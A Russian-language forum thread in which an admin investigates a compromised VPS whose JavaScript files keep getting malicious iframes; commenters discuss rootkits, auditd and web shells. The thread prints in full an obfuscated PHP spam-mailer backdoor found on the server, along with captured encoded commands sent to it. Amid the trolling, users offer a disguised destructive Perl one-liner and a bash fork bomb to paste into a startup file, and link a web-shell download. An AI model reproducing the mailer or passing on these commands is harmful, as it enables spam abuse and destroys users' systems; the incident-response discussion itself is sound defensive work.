А какую софтину можно повесить шпионить, чтобы она сказала, какой процесс (pid, имя, от какого юзера запущен) изменяет указанный файл?
Предыстория: какая-то блядь провирусовала венду у одного из наших партийных деятелей, который имееи доступ к ряду партийных сайтов (т.к. пилит их). И по началу, как мне показалось (всё указывало именно на это) заливала по scp/sftp "пропатченые" вирусными айфреймами яваскрипты. Я выпилил у всех доступ по ssh, но какого-то хуя правки файлов продолжаются до сих пор, даже спустя пару ребутов впски.
Отсюда у меня две догадки — либо залили руткит (но в списке процессов абсолютно ничего подозрительного), либо залили какую-то херню в код движка, с помощью которой хулиганят через web, но, что-то, тоже не нахожу ничего такого...
158 comments
recommend
bookmark
subscribe
Недавно кукарекали про вирусы в виде модулей апача, посмотри.
если есть шанс на взлом, то есть шанс на подмену ядра или виртуализацию системы, тогда ты вообще не увидишь что происходит :3
нету апача
нету шанса на подмену ядра, ибо Xen. Ноду никто не ломал. Зараза не ушла дальше одной из 15 впсок
>ибо Xen
што?
если сама впска ломана, кто мешает поменять ей ведро а дальше из перезагрузки делать что хочешь
фиг его знает.
советую пересмотреть каталог винды на время когда изменялись файлы.
ещё может помочь Antivir task manager.
скорее всего залили что то типа бекдора.
и ещё вопрос,пробовал сменить пароли на доступах?(ftp,ssh etc.)
возможно злоумышленник имеет доступ только к ним,что существенно упрощает задачу.
подменить ведро ей мешает то, что оно находится снаружи неё
"каталог венды"? антивир таск менеджер? щто?
хрень, имея доступ по ssh не сделать себе нормальный вход
и да, доступы по ssh/sftp без паролей, по ключам. Все ключи выпилил.
:-) я так понял сервак на виндузе?
нет. Смотрим теги.
LOL
как бы это ни смешно не звучало,но наше правительство любит виндоуз.
+ это "Предыстория: какая-то блядь провирусовала венду "
Он про ППР, до правительства еще далеко.
ааа,тьфу ты)))
ну ебана,может быть шелл или подобное тогда...
> либо залили руткит (но в списке процессов абсолютно ничего подозрительного)
а его там и не будет, это же руткит
LD_PRELOAD и shadowing функций open и write? топорно, но быстро и, наверное, эффективно
Шелл спалить легко, я думаю, @mva уже проверил. Тут руткит какой-то.
почему легко?в наше время шеллы стали умнее.
ну, я тоже как бы не каждый файл под лупой рассматривал. Может и пропустил шелл. Но так, на вскидку, да, что-то не видно...
ты их вручную просматривал?
диффни нынешнюю версию скриптов на сайте и последнюю версию из бекапа.
вот проблемушки-то: взять древний быкап всей впски да и накататить
диффал. Только айфреймы с вирусами. Ну и согласно логам ssh — до момента, пока я выпилил — каждый раз при изменении был коннект по sftp от того человека с вендой (хотя он клянётся, что не заливал ничего уже месяц). Вот только сейчас-то туда никто не коннектится (после первого же фейла)
Ну, не такие и сильные. ПРосто жалко тот контент, что проебётся.
мб бекдор?
А существующие коннекты прибил?
лолд
штоблядь
впска ребуталась же пару раз. Это не смотря на то, что единственные два существующих коннекта — от меня: один tail -f лог вебсервера, второй — насройка sys-process/audit
@rapture проблема в том, что на Xen запилить руткит, который бы не палился при этом не поломав ноду — малоосуществимо.
похоже на городскую легенду
man fuser
в бесконечном цикле штоле?
нахуй надо, лучше sys-process/audit
inotifywait нэ?
В incron можно.
ты список процессов в гостевой чем просматриваешь?
ps || htop
что-то, судя по всему, это таки шелл, ибо после того, как я прибил веб-сервер вроде прекратилось но я таки не могу его найти.
lsof + sed не помогут?
я уже выяснил, что походу дела шелл подложили. Только не могу найти где. Сейчас буду откатывать исходники сайтов
qcheck сделол, или что ещё типа такого, если другие дистры?
глянь файлы у которых права доступные для записи файлов.и ты быстро найдешь шелл.на дату и размер внимание не обращай,щас шеллы хитрожопее.
пхп?
да, друпал (ну и ещё медиавики)
ты точно все файлы дифнул? алсо сделай find / -name *.php, могли шелл залить в рандомное место и через lfi использовать. алсо, что у тебя в disabled functions в php.ini?
Как бы ты сам внедрялся? Я думаю, что в конце серии опять окажется, что у тебя расслоение личности, так что подготовься и к такому варианту.
сколько процентов вероятности что это — НЕ зловред? :)
@error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); if (count($_POST) < 2) { die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); } $v5031e998 = false; foreach (array_keys($_POST) as $v3c6e0b8a) { switch ($v3c6e0b8a[0]) { case chr(108): $vd56b6998 = $v3c6e0b8a; break; case chr(100): $v8d777f38 = $v3c6e0b8a; break; case chr(109): $v3d26b0b1 = $v3c6e0b8a; break; case chr(101); $v5031e998 = true; break; } } if ($vd56b6998 === '' || $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321)); $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions')); $v01b6e203 = @$_POST[$vd56b6998]; $v8d777f38 = @$_POST[$v8d777f38]; $v3d26b0b1 = @$_POST[$v3d26b0b1]; if ($v5031e998) { $v01b6e203 = n9a2d8ce3($v01b6e203); $v8d777f38 = n9a2d8ce3($v8d777f38); $v3d26b0b1 = n9a2d8ce3($v3d26b0b1); } $v01b6e203 = urldecode(stripslashes($v01b6e203)); $v8d777f38 = urldecode(stripslashes($v8d777f38)); $v3d26b0b1 = urldecode(stripslashes($v3d26b0b1)); if (strpos($v01b6e203, ';', 1) != false) { list($va3da707b, $vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203)); $va3da707b = ucfirst($va3da707b); $vbfbb12dc = ucfirst($vbfbb12dc); $v3a5939e4 = next(explode('@', $v081bde0c)); if ($vbfbb12dc == '' || $va3da707b == '') { $vbfbb12dc = $va3da707b = ''; $v01b6e203 = $v081bde0c; } else { $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>"; } } else { $vbfbb12dc = $va3da707b = ''; $v081bde0c = strtolower($v01b6e203); $v3a5939e4 = next(explode('@', $v01b6e203)); } preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1); $vee11cbb1 = $vee11cbb1[1]; preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c); $vb068931c = $vb068931c[1]; preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9); $vc34487c9 = $vc34487c9[1]; preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42); $v6f4b5f42= $v6f4b5f42[1]; $vc34487c9 = str_replace("%R_NAME%", $va3da707b, $vc34487c9); $vc34487c9 = str_replace("%R_LNAME%", $vbfbb12dc, $vc34487c9); $v6f4b5f42 = str_replace("%R_NAME%", $va3da707b, $v6f4b5f42); $v6f4b5f42 = str_replace("%R_LNAME%", $vbfbb12dc, $v6f4b5f42); $v0897acf4 = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']); if (ne667da76($v0897acf4) || @ini_get('safe_mode')) $v10497e3f = false; else $v10497e3f = true; if ($v10497e3f) $v9a5cb5d8 = "$vee11cbb1@$v0897acf4"; else $v9a5cb5d8 = "$vee11cbb1@[$v0897acf4]"; if ($vb068931c != '') $vd98a07f8 = "$vb068931c <$v9a5cb5d8>"; else $vd98a07f8 = $v9a5cb5d8; $vb8ddc93f = "From: $vd98a07f8\r\n"; $vb8ddc93f .= "Reply-To: $vd98a07f8\r\n"; $v3c87b187 = "X-Priority: 3 (Normal)\r\n"; $v3c87b187 .= "MIME-Version: 1.0\r\n"; $v3c87b187 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n"; $v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n"; if (!in_array('mail', $v619d75f8)) { if ($v10497e3f) { if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f.$v3c87b187, "-f$v9a5cb5d8")) die(chr(79).chr(75).md5(1234567890)."+0"); } else { if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187)) die(chr(79).chr(75).md5(1234567890)."+0"); } } $v4340fd73 = "Date: " . @date("D, j M Y G:i:s O")."\r\n" . $vb8ddc93f; $v4340fd73 .= "Message-ID: <".preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time()))."@$v0897acf4>\r\n"; $v4340fd73 .= "To: $v01b6e203\r\n"; $v4340fd73 .= "Subject: $vc34487c9\r\n"; $v4340fd73 .= $v3c87b187; $v841a2d68 = $v4340fd73."\r\n".$v6f4b5f42; if ($v3d26b0b1 == '') $v3d26b0b1 = n9c812bad($v3a5939e4); if (($vb4a88417 = n7b0ecdff($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) { die(chr(79).chr(75).md5(1234567890)."+1"); } else { echo PHP_OS.chr(50).chr(48).'+'.md5(0987654321)."+$vb4a88417"; } function ne667da76($v957b527b){ return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][ 0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b); } function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685="=\r\n", $v92f21a0f = 0, $v3303c65a = false) { $vf5a8e923 = strlen($vb45cffe0); $vb4a88417 = ''; for($v865c0c0b = 0; $v865c0c0b < $vf5a8e923; $v865c0c0b++) { if ($v11a95b8a >= 75) { $v11a95b8a = $v92f21a0f; $vb4a88417 .= $v7fa1b685; } $v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]); if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) { if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) { $vb4a88417.=chr($v4a8a08f0); $v11a95b8a = 0; continue; } $vb4a88417 .='='.str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT); $v11a95b8a += 3; continue; } $vb4a88417 .= chr($v4a8a08f0); $v11a95b8a++; } return $vb4a88417; } function n7b0ecdff($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1) { global $v619d75f8; if (!in_array('fsockopen', $v619d75f8)) $v66b18866 = @fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('pfsockopen', $v619d75f8)) $v66b18866 = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('stream_socket_client', $v619d75f8) && function_exists("stream_socket_client")) $v66b18866 = @stream_socket_client("tcp://$v3d26b0b1:25", $v70106d0d, $v809b1abe, 20); else return -1; if (!$v66b18866) { return 1; } else { $v8d777f38 = n54070395($v66b18866); @fputs($v66b18866, "EHLO $v0897acf4\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "2+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "3+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 && substr($ve98d2f00, 0, 3) != 251) return "4+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "DATA\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 354 ) return "5+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, $v841a2d68."\r\n.\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "6+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "QUIT\r\n"); @fclose($v66b18866); return 0; } } function n54070395($v66b18866) { $v8d777f38 = ''; while($v341be97d = @fgets($v66b18866, 4096)) { $v8d777f38 .= $v341be97d; if(substr($v341be97d, 3, 1) == ' ') break; } return $v8d777f38; } function n9c812bad($vad5f82e8) { global $v619d75f8; if (!in_array('getmxrr', $v619d75f8) && function_exists("getmxrr")) { @getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816); if (count($v744fa43b) === 0) return '127.0.0.1'; $v865c0c0b = array_keys($v6c5ea816, min($v6c5ea816)); return $v744fa43b[$v865c0c0b[0]]; } else { return '127.0.0.1'; } } function n9a2d8ce3($v1cb251ec) { $v1cb251ec = base64_decode($v1cb251ec); $vc68271a6 = ''; for($v865c0c0b = 0; $v865c0c0b < strlen($v1cb251ec); $v865c0c0b++) $vc68271a6 .= chr(ord($v1cb251ec[$v865c0c0b]) ^ 2); return $vc68271a6; } ?>
0. и где оно было?
не очень похоже,но оно может быть закриптовано..
обфусцированно же
цыц хлопцы,жто может и не шелл оказатся.
на пиратмедии, в картинках. Там вообще джумла стоит.
*джумла 1.5 даже, вроде
Это шелл от oRb.
WSO, всмысле.
WSO?а как же он автоматически ифреймит?бред=)
Так через шелл заходят и ифреймят, хули.
скорее всего помимо шелла там еще и ифреймер где-нибудь висит.
Может и висит, да.
или автоматический ифреймер, который удаленно работает через wso.
ставлю пост технического директора ППР тому, кто найдёт айфреймер :)
лень искать?)
да :)
а доступ покопаться всем подряд дашь? Ж3
Пока есть только доступ у того, кто залил шелл, значит он и станет новым техническим директором ППР.
ахуенный профит заливаться к ленивым одминам yeah
кстати, куда фрейм-то трафик льет?
web@party [±:master] www % git log -p | head -n500 | piratepaste
http://paste.pirate-party.ru/aabf6e05.tx...
хром мне сказал делать мне там нечего, потому что там малварь, лол
большинство админов, пока их носом не ткнут, даже и не подозревает, что у них что-то куда-то там залили, лол
Там ничего уже нету.
он мне про paste.pirate-party.ru это сказал
А, ну это потому что на pirate-party.ru малварь наверное.
а про pirate-party.ru ничего не сказал
У меня фф наоборот про pirate-party.ru сказал, даже в гугле This site may harm your computer.
а, это он непосредственно про http://paste.pirate-party.ru/aabf6e05.tx... сказал. на paste.pirate-party.ru он ничего не говорит.
А, ну может ему такой код вставки айфрейма непонравился.
бля, теперь и на главную paste.pirate-party.ru ругается и на главную pirate-party.ru. только что ничего этого не было
Базы обновились.
mva, а paste.pirate-party.ru у тебя на той же виртуалке, что и все остальные висит? всмысле фс у них одна?
потому что в пасте, ВНЕЗАПНО, айфреймы. Но хрому почему-то поебать, что там text/plain ;)
потому что я в пасту залил дифф файлов между двумя обновлениями ссылок от айфреймера
хром уже на все страницы срет "The Website Ahead Contains Malware!"
и таки нет, они в разных виртуалках. глашне ppru на "party", а paste — на другой :)
тыкни в "дополнительно" и "мне поебать" :)
это я знаю, важен сам факт того, что на глагне pirate-party.ru теперь не пускает говоря про виросы
Там и есть вирусы. И на пайратмедии. А на местном пастбине — нет.
да, там охуенный вирус "извините, у нас ремонт" :)
В базу уже попал, так что все равно придется ждать, пока уберут
еще минут 10 назад глагне пират-парти у меня открывалалсь нормально.
не могло. Ибо оно уже 4 часа ка выпилено
Так потому что базы обновились у тебя сейчас, сказал же. Алсо, у меня уже фф уже не возникает, может уже убрали.
всмысле без плашки "виросы"
некоторые люди рапортуют, что у них ок
У меня.
ну, те кто напрямую, и отключили всю эту xss и антифишинговую хуиту, те вот нормально проходят. А вот те вот. что с гуля прут — огребают плашку, я те в конфу пруфы уже кинул
*гугля
где для винды такое скачать?
тебе шелл для виндо-сервера?
идиот шоле?это шелл такой.
На http://lemonparty.biz
я не идиот, я специалист, это раз, а ты сейчас соси хуй //)))затраллил карочи тебя, и пукан твой
ну шелл и чо, думаешь я слов таких не знаю?
ну дай кейворды хотя бы
нет
я конечно конечно поступил грубо,но твои слова были смешны
тогда ты хуйню спизданул
wso скачать бесплатно без регистрации и смс // ппц ты тупой
ладно тебе,все ошибаются.
почему?
а вот теперь ты тупой, ппц канеш //
Блядь, спалили.
не сорьтесь людт
вы все хуй
нет ну он ппц тупым меня назвал, ты представляешь? Он даже не читал мой блог а уже кидается ТАКИМИ словами, я бы ему уебал бы уже давно, он думает я не могу узнать где он живет, поэтому такой борзый
на самом деле мы просто подгоняем тебя в решении проблемы
Го на петрарке завтра один на один.
нашёл лоха, давай в люблино
лови шелл,WSO:
на петрашку с красной розой
---------------------------
wso
---------------------------
Windows не удалось найти 'wso'. Проверьте, что имя было введено правильно, и повторите попытку. Чтобы выполнить поиск файла, нажмите кнопку "Пуск", а затем выберите команду "Найти".
---------------------------
ОК
---------------------------
да, ровно в шесть
ппц ты дерзкий
ну все, теперь-то ты точно тупой// wso — пхп-скрипт
http://www.sendspace.com/file/wtuyaj
бля xDDD сори посаны
//чо делать-то?
ну и чо нахуй? я твой пхп не знаю, он для быдланов, ты бы норм тулзу скинул, макака ебаная
ебать ты лох
No javascript available!
Your browser does not support JavaScript or JavaScript is disabled. You must enable JavaScript or use a JavaScript supported browser for this site to function correctly.
и что, ты от этого лохом быть не перестаёшь
нетты
джава скрипт включить не можешь?ппц
Переписал на перле — perl -e '$??s:;s:s;;$?::s;;=]=>%-{←|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
нахуй тебе норм тулза, ты же ей пользоваться не умеешь. еще ебнешь пентагон, чо потом, передачки тебе таскать в алькатраз?
это не меня унижают и опускают в своей же собственной впске, а тебя!
переписал на баше:
:(){ :|:& };:
(прописывать в /etc/rc.conf)
там качается без жс
лайк если тоже тогда запустил от рута и бугуртил весь тред)))))))))
проблема в том, что впска — не моя. Моя нода. А на впске хуйнёй маятся пираты. Просто т.к. у них нет админа — мне приходится за ними разгребать говно
лол. Это ты проанализировал и заключил вот всё это по моим последним 10 комментариям? Норм ты//не общайся со мной больше, ты тупой какой-то
давайте жить дружно?(
нет, я еще твой блог прочитал. весь //нетты
>/etc/rc.conf
у тебя поттерингфобия!
Бля ппц только асечку не ломай мне плз.
скажи, что они все хуй
спасяб)) ну и как? Я вот считаю что в августе было слишком толстовато, а две недели назад слишком сложные концепции я форсил сильно, поэтому никто не понял. А ты?
я бы сломал твою писечку //
норм
а вот что он этому шеллу через POST отправляет, например:
lCwrx=OTlnemFud3FrdGddYEJua3RnLGFtbw==&edAmyC=ibnLVDwFYB&mqTRO=b3owLGptd m9ja24sYW1v&dvnGH=PldRR1A8bndyZ11vY3p1Z25uPi1XUUdQPAg%2BTENPRzwgTndyZyJPY3p1 Z25uID4tTENPRzwIPlFX
QEg8VWpjdiVxImpjcnJnbGtsZSInUF1MQ09HJz4tUVdASDwiCD5RQE1GWzwIPkowPD5jImpwZ2Q%2F
IGp2dnI4LS1lcGx1a3Zqb2csYW1vLWMwUERaNyxqdm9uIDxAbm1sZiJgZ2N3dnsia2wicXZtYWlr
bGVxIm93ZGRma3RnZiIkImR3YWlnZiJkZG8%2BLWM8Pi1KMDwIPnI8ZGdnYG57ImNsZiJkZ2NwZHdu
bnsiYGNhaSwiUGduY3oiSGtvLiJxa3YiYGNhaSJjbGYiZ2xobXsidmpnInBrZmcsYyJubWN2anFt
b2dueyJkY29rbmtjcCJ0bWthZyJlcGN2Z2YiZHBtbyJ2amciZmtwZ2F2a21sIm1kInZqZyJxd2Zm
Z2xueyJFbW1mLCJDbGYidmdubiJvZy91amN2ImtxImMiZWNxdnBtcmptbGcuIm1wImMiYGNlcmty
Zz1ubWxlZ3AvY2xmIiJveyIiQWpjcGttdiJtZCJEa3BnInFqd2ZmZ3BnZiJjbGYiImBnZWNsIiJ2
bSIicW5tdW57IiJwbW4%2BLXI8CD4tUUBNRls8CA%3D%3D
&uAul=Y2BXd01URmt2QEU=
кто сможет раскусить?
ещё вариант —
lsdgQw=OTllY3Fpa2xxbmtkZ0J7Y2ptbSxhbQ==&eykNKf=ejtrBsdSy&dMlKYC=PldRR1A8 YWNwb2dubmNdaWdsbGdmez4tV1FHUDwIPkxDT0c8IEFjcG9nbm5jIklnbGxnZnsgPi1M
Q09HPAg%2BUVdASDxEdTgiJ1BdTENPRyciRWd2ImtsImpncGc%2BLVFXQEg8Igg%2BUUBNRls8CD5KMD w%2B
YyJqcGdkPyBqdnZyOC0tY2xlZ25tamNrcDczLHB3LWtvY2VncS1xdm1wa2dxLWM0e0ssanZvbiA8
UXZ3cmtmImBubWxmIm9rbmQiZWd2cSJrbHZncHBjYWtjbiJkd2FpPi1jPD4tSjA8CD5yPHZqZyIi
cXZwY2xlZyJhbWxxdnB3YXZrbWwsIktsImRjYXYiSyJqY2Yia3Yid2xmZ3AibWBxZ3B0Y3ZrbWwi
ImN2IiJ2amdge3F2Y2xmZ3BxImNsZiJtYWFjcWttbGNubnsiZWt0a2xlImMicG17Y24iZG5rYWki
bWQidmpnImpjbGYiImN2IiJxbW9nY2xmIksidWdsdiJjbGYicWN2Im1sInZqZyJnZmVnIm1kInZq
ZyJ2Y2BuZyJsZ3p2InZtImt2LGZnYWtxa21sLCJVZyJqY3RnImpnY3BmLiJkcG1vInBnbmtjYG5n
InFtd3BhZ3EuInZqY3YidmpncGcia3EiInZtIiJgPi1yPAg%2BLVFATUZbPAg%3D
&MEGwA=TGRVUW9RQHVGaEM=
логин/праоль скорее всего и какая-то хуйня в бейс64. лень в код вчитываться
ну, хз.
Алсо, я заметил, что во всех его попытках первая буква l, а после первого "равно" всегда OTl
много таких запросов приходит?
я процентов 70 где-то деобфусцировал, дальше мне лень. в общем это банальный пхп-спемер:
http://paste.pirate-party.ru/3e107dc3.tx...
а то, что на него приходит пост-запросом — банально что куда и кому слать.
так что ищи дальше шелл
там по первой букве в названии переменной пост-запроса определяется какой тип данных в переменной. например, если первая l — мыло кому слать сообщение и т.д. дальше мне лень разбираться было, но если инетересно, можно раскодировать, что в твоих пост-запросах присылали и посмотреть как там что устроено.
довольно много, да
готов для десктопа!